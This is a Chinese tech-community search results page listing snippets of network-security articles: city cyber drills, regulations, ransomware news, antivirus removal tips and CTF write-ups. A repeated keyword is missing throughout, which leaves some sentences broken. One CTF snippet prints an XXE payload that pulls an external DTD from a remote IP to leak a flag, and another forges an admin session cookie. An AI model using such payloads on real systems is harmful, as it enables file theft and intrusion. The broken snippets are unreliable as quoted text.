首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏智能相对论

    中部“第一城”,长沙以何

    文丨智能相对论(aixdlun) 作者丨陈壹 再攀高峰,“三大高地”助推长沙“长安” 没有网络安全,就没有国家安全。 勇开先河, 引领城市级实战演练 6月21日,一场特殊的“战役”,将在长沙打响——由长沙市办主办,在真实网络环境下,来自全国的16支一流网络安全队伍,对长沙市120个重要信息系统开展了一场网络空间攻与防的较量 2020年,联合奇集团投资1亿元成立奇星城合资公司,建设城市网络安全运营中心,率先探索开展城市级网络安全整体运营服务,并建成长株潭区域级攻防演练靶场,打造城市网络安全能力输出中心,构建城市内生网络安全体系 再攀高峰, “三大高地”助推长沙“长安” 按照“冰山理论”,露在水面以上的只是其十分之一,而另外 90%是看不见的。 同样,在拿下“中部第一城”背后,长沙在网络安全技术、网络安全产业集群、网络安全生态,已经构筑了巨大的山体、打造了一个个高地,这些反过来又让其行业影响力和人才吸引力大增,为长沙打造“网络长安”提供了基础

    65030编辑于 2022-09-03
  • 来自专栏Khan安全团队

    杯部分wp

    那么当前生成的admin的session就是 eyJ1c2VybmFtZSI6ImFkbWluIn0.YJo7Og.7WfYqubO5M7KZ-8IXXKIp6kMf5o,edit this cookie Adobe Acrobat (pdf), 文件头:255044462D312E Quicken (qdf), 文件头:AC9EBD8F >i', h)) for x in range(4): data[x+4] = width[x] data[x+8] :",end="") width1=binascii.b2a_hex(width) width1=width1.decode('utf-8' end="") height1=binascii.b2a_hex(height) height1=height1.decode('utf-8'

    1K30发布于 2021-05-28
  • 来自专栏kali blog

    术语知道少

    POC(Proof of Concept)漏洞验证。即通过一段说明或者一个攻击的样例,使得能够确认这个漏洞是真实存在的。(侧重于验证是否存在) 如,我们在验证站点是否存在xxs漏洞时,常用下面命令来验证。

    29800编辑于 2025-07-28
  • 来自专栏安恒信息

    2017年报连载8:风险型经济犯罪事件篇

    ? ? ? ? ? ? ?

    55040发布于 2018-04-09
  • 来自专栏安恒信息

    河北省委办与恒信息签订战略合作框架协议

    恒信息 网络安全前沿资讯、 应急响应解决方案、技术热点深度解读 当下,伴随着信息经济的飞速发展,我国的网络安全也面临着一定的威胁与挑战。 为顺应当下网络安全发展态势,更好地协调涉及经济、政治、文化、社会及军事等各领域的网络安全信息化等问题,8月3日,河北省委办与恒信息签订战略合作框架协议。 ? 协议签订后,双方将依托双方各自优势资源和手段,积极探索合作模式,不断增加合作层次,拓宽研究领域,提升网络安全防护能力、应用水平和人才培养能力,支撑省委办在网络安全监控、防护、感知、技术应用以及人才培养工作领域的不断创新和发展 3日下午,河北省委宣传部副部长、省委办主任张砚平、河北省委宣传部部务会成员、省委办副主任李建勋、河北省委办总工程师张平等11位河北省委办领导;浙江省委办网络安全处处长宋皆荣、浙江省委办信息化协调处干部金贝聪等浙江省委办领导莅临安恒信息参观指导 “恒信息一定会更好、更深地去拥抱每一个行业,助力河北省数字经济的发展和信息化建设的推进,在新时代做出更好的成绩。”范渊表示。

    1.4K30发布于 2018-08-17
  • 来自专栏Java实战博客

    缓存 &

    底层用的是谷歌浏览器的内核(卓)。虽然微信用人家的,但是砍了很多功能,比如看不到Network 去查看自己微发送的请求。 我们在做Web开发的时候,微缓存非常的恶心,很多情况是看不到效果的,所以我们必须清理缓存。 debugx5.qq.com http://debugtbs.qq.com/ 清除缓存后,再微信内部再次刷新网页 打开界面依次是: image.png image.png 注意 苹果是打不开卓调试的,

    93820编辑于 2022-01-19
  • 来自专栏信安之路

    Monyer 的之路

    回想起来,我从高中时期 02 年左右开始接触学习网络安全,到大学时期 06 年博客流行时成为网络安全活跃分子,再到 11 年进入某部门的网络沉寂期,再到18年离开后再次的不安分,可算得上是一段跌宕起伏的岁月了。

    80530发布于 2019-08-20
  • 来自专栏全栈程序员必看

    360奇天擎卸载不干净_强力卸载奇

    人狠话不多,直接上教程! 找到软件安装目录下的EntBase.dat文件,比如我的位置是 D:\QAX\360Safe\EntClient\conf\EntBase.dat。打开如下:

    3.1K20编辑于 2022-11-08
  • 来自专栏网络安全【故里】

    河南金盾CTF

    xml version="1.0" encoding="UTF-8"?> <!DOCTYPE any[ <! 43.143.195.203:8080/dtd/1.dtd"> %h; %dtd; ]> <user>&xxe;</user> 图片 图片 Base64解码得到flag 图片 flag{tqxh8rvijg4jibuxuzfaarvq8esu24uz ,0x166B34BD,0x6232283A, 0x4A1A8794,0x0D591779B }; uint32_t v8[4]; v8[0] = 0x5571CB4E; v8[1 ] = 0xC38A9D2F; v8[2] = 0x1D835B62; v8[3] = 0x93C3DC19; int n = 9; btea(v, -n, v8); for ​ } } } 图片 flag{3430DF69-C220-40F9-9667-2B8C4A2FE6E9}

    1.3K60编辑于 2023-04-21
  • 来自专栏FreeBuf

    国家办发布《部门行政执法程序规定》

    规定部门实施行政执法应当坚持处罚与教育相结合,做到事实清楚、证据确凿、依据准确。《规定》规定了部门行政执法地域管辖、级别管辖、指定管辖、移送管辖等制度,明确了“一事不二罚”原则。 《规定》规范了部门行政执法程序。一是明确立案、调查取证、审核、决定、送达、执行等多环节的具体程序要求,并规定部门应当依法以文字、音像等形式进行全过程记录,归档保存。 四是明确重大处罚案件集体讨论决定制度,对情节复杂或者重大违法行为给予行政处罚,部门负责人应当集体讨论决定。五是明确规定部门办理行政处罚案件的期限以及结案的具体情形。 规定国家部门依法建立本系统的行政执法监督制度,上级部门对下级部门实施的行政执法进行监督。部门实施行政处罚应当接受社会监督。 公民、法人或者其他组织对部门实施行政处罚的行为,有权申诉或者检举;部门应当认真审查,发现有错误的,应当主动改正。 《规定》的出台对于规范部门行政执法行为具有重要意义。

    46120编辑于 2023-03-29
  • 来自专栏全栈程序员必看

    卸载奇天擎_奇天擎怎么卸载干净

    卸载奇天擎 背景 办公原因,在一个临时职场上为个人电脑安装了奇本身有1.2G大小,不算小 安装之后,每次开机风扇都会呼呼吹一阵子,cpu等使用率和温度都较高,怀疑是奇导致的 不能随意设置开机自启动 ,退出,删除等,退出和删除需要提供密码 步骤 奇设置中,关闭自我保护:设置->防护中心->自我保护。

    4.4K10编辑于 2022-11-09
  • 零零-暗新闻:美国 Insight Hospital and Medical Center Chicago 遭勒索软件攻击

    2026年2月下旬,InsightHospitalandMedicalCenterChicago(域名:insightchicago.com)被勒索软件团伙在其暗泄露站点公开列为受害者。

    14210编辑于 2026-02-26
  • 零零-暗新闻:美国大匹兹堡骨科协会遭勒索软件攻击

    公司成立于匹兹堡,拥有241名员工,年收入约730万美元,该协会于2025年10月8日遭勒索软件攻击。 社会安全号、薪资信息)●财务记录(financialrecords)●内部行政文档(administrativedocuments:合同、合规文件)总结大匹兹堡骨科协会被勒索软件攻陷,数据自2025年10月8日起加密并下载

    12610编辑于 2026-02-26
  • 来自专栏网络安全观

    详解工部司局明年重点工作和思路(软司、通信司、信管局、局)

    中国软件名城示范带动作用显著增强,全国8个名城业务收入合计占全国比重超过60%。 缩短跨地区电信业务经营许可审批用时15日,降低码号资源占用费、手机进检测收费标准50%,设备进许可平均审批时间压缩至10天。三是加强事中事后监管。 杭州、福州、贵阳·贵3个新增骨干直联点全部建成开通试运行。进一步下调互联网网间结算价至12万元/G/月,下调幅度为33%。二是加快国际通信发展。在云南、上海、新疆增设5个国际通信出入口局。 二是全面推进三融合。持续深入贯彻落实《三融合推广方案》,推动三融合在全国范围内展开。三是深入优化网络架构。继续促进网间带宽扩容,探索建立新型网络互联模式。 加快推进网络安全产业创新发展,工部和北京市政府签订了《关于建设国家网络安全产业园区战略合作协议》,举办首届中国网络安全产业高峰论坛,启动国家网络安全产业园区建设。

    1.3K20发布于 2021-02-25
  • 来自专栏FreeBuf

    Canalys报告:疫情后复杂的安生态

    据估计,将近三分之一的互联网流量由恶意机器人制造,超过三分之一站登录和其他数字服务的登录记录是虚假的。 盗刷团伙利用先进的机器人和自动化技术,抢夺新冠疫情期间在线电商的流量红利。

    49720编辑于 2023-04-26
  • 来自专栏LongJava学习资料

    -演示栈溢出漏洞实验

    如果向栈上声明的缓冲区中复制数据,但是复制到数据量又比缓冲区大的时候,就会发生栈溢出。在栈上声明的各种变量的位置紧临函数调用程序的返回地址。若用户输入的数据未经验证就传递给strcpy这样的函数,则会导致变量值被攻击者指定的值所改写或调用函数的返回地址将被攻击者选择的地址所覆盖,打乱程序正常运行流程,转而执行恶意代码。防范栈溢出的有效方法有:禁止栈执行,从而阻止攻击者植入恶意代码;编写安全可靠的代码,始终对输入的内容进行验证;利用编译器的边界检查实现栈保护。

    60700编辑于 2023-12-25
  • 来自专栏FreeBuf

    我认识的那些客户

    这些年,和各种类型的客户打过交道,有些事想起来还挺有意思。 客户A:软件才买成2000,为啥你改一下就要4000!!! 那年我还是学生,平时喜欢搞一些破解的事情,这个客户算是我第一单安生意吧。 客户是我一个朋友介绍的,他在省城开连锁门店,花2000块买了一个类似ERP的客户关系管理软件,主要用途就是管理充值卡。 客户F:一个人干,十个人看  客户是西部某省大金融的技术科长,有一年国庆节前要固保障,正好网络改造项目还没实施完,客户就全部天天熬夜加班搞。 和客户打交道,虽然有时候也会想耍点手段,但最终发现还是需要以诚相待才长久一些,毕竟安全无小事,你坑客户一次,失去了信任,客户永远就不会再给你机会。 最后祝我的客户们兔年安心、顺心! 精彩推荐

    47130编辑于 2023-02-24
  • 来自专栏信安之路

    兜哥的之路

    本文作者:兜哥 文章来源:兜哥带你学安全 欢迎大家分享自己的之路 2008 年,我是看着《我的华为十年》这篇文章进入这家公司的,当时我的总监就是这篇文章的作者家俊,文档地址: http://www.doc88 小时候觉得工程师很牛逼,工作后发现其实叫工更合适,就和电工一样。好在安全工程师说起来还有点黑客帝国的感觉,即使简称工,也感觉和同仁堂的救命神药宫硫磺一样牛逼哄哄的。 那段时间我还在陪大肉升级交换机 OS 和灌配置的过程中自学了 CCNA 和 CCNP,现在也很怀念和大肉在威大厦里面灌配置的日子。 相对内部,生产攻击面大很多,毕竟这些业务是 7 乘 24 对数亿名提供服务的。我们面对的最大挑战就是如何在业务不中断,不损失访问流量的情况下保障业务的安全。 后面一段时间,我和销售一起见过不少客户,通常我们测试的用户都会有微群,大家反馈问题都在微群里,我那段时间经常在微群里和用户沟通交流,产品侧的问题我们很快就迭代修改,经常上午反馈的问题我们下午就可以上线

    1.1K20发布于 2018-08-08
  • 来自专栏网络安全【故里】

    2023河南金盾CTF

    {4d65dc12-1a22-4567-96c1-0478057c3932} get_source 构造即可 a[]=1&b=1&pwn[]=1 flag{b1d05756-09f9-41e1-96c8- 4355cc0e8b52} easyphp php源码分析 require_once 绕过不能重复包含文件的限制-安全客 - 安全资讯平台 (anquanke.com) 用这个方法读取hint.php源码 60%29%3B%22%3B%7D%7D%7D%7D flag{2a20e466-19b4-4b72-b6b2-837cde465d1c} Ezupload 非预期,直接访问/flag flag{b7cb8a43 a9fd-1bf6P3af exiftool查看图层文本信息得到被遮挡的数据 整理得到pyc文件 保存之后使用pyc-stegosaurus隐写得到flag【必须使用python3.6环境】 8e8f} 拼接得到完整flag flag{bc8394aa-7e32-47e8-a9fd-1bf683af8e8f} RE RE1 密文如下 跟进 0x403740 按 c 转为汇编代码 P 创建函数,f5 反编译得到解密代码

    1K30编辑于 2023-11-26
  • 来自专栏DIY

    可Ai-WB2模组做一个433

    以下作品由可社区用户业余菜狗制作前言自从接触智能家居之后,笔者就变得很依赖智能家居(绝对不是懒!)比如卧室灯,就在进门的地方,进门开灯很方便,但是晚上睡觉关灯就很不方便。 还真让我找到了——433射频开关,但是笔者用的Home Assistant系统是不能直接接入433开关的,所以就用可Ai-WB2模组DIY了一个433关,将433遥控信号转发给Home Assistant t uart_433_data[16];uint8_t mqtt_433_data[6];uint8_t mqtt_433_data_old[6];uint8_t mqtt_st;ret = hosal_uart_receive = mqtt_433_data_old[i]){mqtt_st = 1;}}//打印出新旧数据uart0_send(mqtt_433_data_old, 6);uart0_send((uint8_t * (bl_gpio_input_get_value(pair_IO))){time_nv = 0;}if (time_nv>200){X = 0;}vTaskDelay(200);}uint8_t data

    42120编辑于 2025-04-23
领券